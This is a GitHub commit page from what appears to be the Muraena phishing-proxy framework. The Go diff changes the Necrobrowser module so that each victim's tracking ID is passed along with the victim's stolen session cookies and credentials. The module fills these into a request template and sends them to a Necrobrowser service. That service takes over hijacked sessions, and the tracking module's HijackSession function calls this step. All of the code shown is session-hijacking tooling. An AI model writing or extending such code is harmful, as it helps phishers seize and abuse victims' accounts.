Skip to content

Commit

Permalink
Pass Tracking ID to Necrobrowser
Browse files Browse the repository at this point in the history
  • Loading branch information
@ohpe
ohpe committed Nov 24, 2022
1 parent d4b2c73 commit a99c513
Show file tree
Hide file tree
Showing 2 changed files with 12 additions and 3 deletions.
13 changes: 11 additions & 2 deletions module/necrobrowser/necrobrowser.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,7 @@ const (
Author = "Muraena Team"

// Placeholders for templates
TrackerPlaceholder = "%%%TRACKER%%%"
CookiePlaceholder = "%%%COOKIES%%%"
CredentialsPlaceholder = "%%%CREDENTIALS%%%"
)
Expand Down Expand Up @@ -155,7 +156,7 @@ func (module *Necrobrowser) CheckSessionCookies() {

// if we find the cookies, and the session has not been already instrumented (== false), then instrument
if cookiesNeeded == cookiesFound && !v.SessionInstrumented {
module.Instrument(v.Cookies, "[]") // TODO add credentials JSON, instead of passing empty [] array
module.Instrument(v.ID, v.Cookies, "[]") // TODO add credentials JSON, instead of passing empty [] array
// prevent the session to be instrumented twice
_ = db.SetSessionAsInstrumented(v.ID)
}
Expand All @@ -171,7 +172,11 @@ func Contains(slice *[]string, find string) bool {
return false
}

func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJSON string) {




func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCookie, credentialsJSON string) {

var necroCookies []SessionCookie
const timeLayout = "2006-01-02 15:04:05 -0700 MST"
Expand Down Expand Up @@ -206,6 +211,7 @@ func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJ
}

cookiesJSON := string(c)
module.Request = strings.ReplaceAll(module.Request, TrackerPlaceholder, victimID)
module.Request = strings.ReplaceAll(module.Request, CookiePlaceholder, cookiesJSON)
module.Request = strings.ReplaceAll(module.Request, CredentialsPlaceholder, credentialsJSON)

Expand All @@ -224,3 +230,6 @@ func (module *Necrobrowser) Instrument(cookieJar []db.VictimCookie, credentialsJ
module.Info("NecroBrowser Response: %+v", resp)
return
}



2 changes: 1 addition & 1 deletion module/tracking/tracking.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -510,7 +510,7 @@ func (t *Trace) HijackSession(request *http.Request) (err error) {
} else {
nb, ok := m.(*necrobrowser.Necrobrowser)
if ok {
go nb.Instrument(victim.Cookies, string(creds))
go nb.Instrument(victim.ID, victim.Cookies, string(creds))
}
}

Expand Down

0 comments on commit a99c513

Please sign in to comment.